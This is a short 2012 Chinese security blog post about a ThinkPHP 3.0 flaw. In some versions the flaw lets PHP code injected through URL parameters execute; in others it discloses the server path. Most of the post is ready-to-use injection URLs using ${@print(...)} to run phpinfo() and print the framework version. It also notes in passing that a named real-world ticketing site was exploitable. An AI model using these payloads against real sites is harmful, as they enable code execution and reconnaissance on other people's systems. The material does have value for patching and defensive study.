thinkphp 3.0 爆路径漏洞

分类:安全 | 2012-08-10 | 撸过 299 次
0人扯谈

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。

检测有两种情况

1. 可执行命令,这个估计是伪3.0版本?

交大定票

此站到可以执行命令

http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

可查看版本

http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D

可查看phpinfo信息

2. 不可执行命令,爆路径

http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7

http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7

http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D

 

 

 

 

本站内容均为原创,转载请务必保留署名与链接!
thinkphp 3.0 爆路径漏洞:https://www.webshell.cc/3940.html

随机日志